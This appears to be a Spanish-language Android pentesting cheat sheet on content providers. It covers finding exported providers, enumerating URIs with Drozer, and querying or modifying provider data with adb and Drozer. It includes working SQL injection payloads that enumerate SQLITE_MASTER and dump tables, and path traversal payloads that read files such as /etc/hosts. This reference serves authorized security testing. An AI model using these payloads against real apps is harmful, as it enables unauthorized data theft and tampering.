Content providers

Búsqueda de content providers con exportación habilitada

# AndroidManifest.xml
## explícitamente
grep "<provider" app-decompiled/AndroidManifest.xml | grep "android:exported=\"true\""
## implícitamente
grep "<intent-filter" -B 1 app-decompiled/AndroidManifest.xml | grep "<provider" | grep --invert-match "android:exported=\"true\""

# Drozer
run app.provider.info -a <app-package-name>

Obtener URIs de content providers

# Drozer
run app.provider.finduri <app-package-name>
run scanner.provider.finduris -a <app-package-name>

Interacción general con content providers

Android Debug Bridge (adb)

# General
adb shell content <command> --uri <uri> <parameters>

# Select
adb shell content query --uri <uri>
adb shell content query --uri <uri> --projection <column-name>
adb shell content query --uri <uri> --where <column-name>=<column-value>
adb shell content query --uri <uri> --where "<column-name>=\'<column-value>\'"

# Insert
adb shell content insert --uri <uri> --bind <column-name>:<column-type>:<column-value>

# Delete
adb shell content delete --uri <uri>
adb shell content delete --uri <uri> --where <column-name>=<column-value>

# Update
adb shell content update --uri <uri> --bind <column-name>:<column-type>:<column-value> --where <column-name>=<column-value>

# Lectura de archivo
adb shell content read --uri <uri>/<file>

# Descarga de archivo 
adb shell content read --uri <uri>/<file> > <file>

Drozer

# Select
run app.provider.query <uri>
run app.provider.query <uri> --projection <column-name>
run app.provider.query <uri> --selection <column-name>=<column-value>
run app.provider.query <uri> --selection <column-name>=\'<column-value>\'

# Insert
run app.provider.insert <uri> --<column-type> <column-name> <column-value>
run app.provider.insert <uri> --string <column-name> <column-value> --integer <column-name> <column-value>

# Delete
run app.provider.delete <uri>
run app.provider.delete <uri> --selection <column-name>=<column-value>
run app.provider.delete <uri> --selection <column-name>=\'<column-value>\'

# Update
run app.provider.update <uri> --selection <column-name>=<column-value> --<column-type> <column-name> <column-value>

# Lectura de archivo
run app.provider.read <uri>/<file>

# Descarga de archivo
run app.provider.download <uri>/<file> .

SQL injection (SQLi)

Identificación de SQLi.

# Android Debug Bridge (adb)
adb shell content query --uri <uri> --projection "\'"

# Drozer 
run scanner.provider.injection -a <app-package-name>
run app.provider.query <uri> --projection "'"
run app.provider.query <uri> --selection "'"

Enumeración de tablas.

# Android Debug Bridge (adb)
adb shell content query --uri <uri> --projection "*\ FROM\ SQLITE_MASTER\ WHERE\ type=\'table\'\;--"

# Drozer
run scanner.provider.sqltables -a <app-package-name>
run app.provider.query <uri> --projection "* FROM SQLITE_MASTER WHERE type='table';--"

Obtención de datos de una tabla.

# Android Debug Bridge (adb)
adb shell content query --uri <uri> --projection "*\ FROM\ <table>\;--"

# Drozer
run app.provider.query <uri> --projection "* FROM <table>;--"

Path traversal

Identificación de path traversal.

# Drozer
run scanner.provider.traversal -a <app-package-name>

Lectura de archivo.

# Android Debug Bridge (adb)
adb shell content read --uri <uri>/<file>
adb shell content read --uri <uri>/../../../<file>
adb shell content read --uri <uri>/../../../etc/hosts

# Drozer
run app.provider.read <uri>/<file>
run app.provider.read <uri>/../../../<file>
run app.provider.read <uri>/../../../etc/hosts
AnteriorDeep linksSiguienteServices

Última actualización